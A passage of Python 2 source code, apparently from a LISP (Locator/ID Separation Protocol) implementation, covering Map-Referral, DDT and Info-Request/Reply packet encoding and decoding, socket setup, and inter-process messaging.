# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegatione_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node():
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be retunred by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix with
# EID-prefix-AFI set to 0. EID appened below follows with hostname
# or AFI=0:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | <hostname--null-terminated> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info():
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
# Zero out key-id, auth-data-len, ttl, reserved, eid-mask-len, and
# eid-prefix-afi.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname null terminated string with AFI 17.
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += self.hostname + "\0"
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
class lisp_nat_info():
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source():
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword and convert to binascii by byte-swapping and zero filling
# longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#endif
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
return(("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) + \
"@" + packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be source from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
return("control-packet@" + dest + "@" + str(dport) + "@" + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
return("command@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_api_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
return("api@" + str(len(data)) + "@" + source + "@@" + data)
#enddef
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in 15000 byte segments since the socket interface will not allow
# to support more. And socket.setsockopt() won't alow to increase SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error, e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = ""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + " "
offset += 8
length -= 4
#endfor
return(new)
#enddef
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# If Map-Request/Reply RLOC-probe set TTL for outgoing packet to 255.
#
set_ttl = (LISP_RLOC_PROBE_TTL == 128)
if (set_ttl):
lisp_type = struct.unpack("B", packet[0])[0]
set_ttl = (lisp_type in [0x12, 0x28])
if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
#endif
try: lisp_socket.sendto(packet, (address, port))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#
# Set back to default TTL.
#
if (set_ttl): lisp_set_ttl(lisp_socket, 64)
return
#enddef
#
# lisp_receive_segments
#
# Process 1500 byte segments if received IPC packet greater than what sockets
# can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
# If the total length is equal to the segment length. We only have one
# segment which is the packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, last
# partial packet must be dropped.
#
if (segment.find("packet@") == 0):
seg = segment.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@"). This is a bit-stuffing
# procedure. Only look array elemsnts with index 2 and above.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = ""
for segment in payload: packet += segment + "\x40"
return(packet[:-1])
#enddef
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
# sender, then IP did it so it is assebled into a complete datagram
# in this sytem.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
loop = False
while (assembled == False):
data = data.split("@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0]
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2]
port = data[3]
#
# If any of the data payload has a 0x40 byte (which is "@" in
# ascii), we will confuse the IPC separator from real data.
# So go to the payload and put in 0x40 where split() seperated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endif
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
timestamp = time.time()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl, timestamp)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl, timestamp)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
else:
if (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
#endif
lisp_process_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
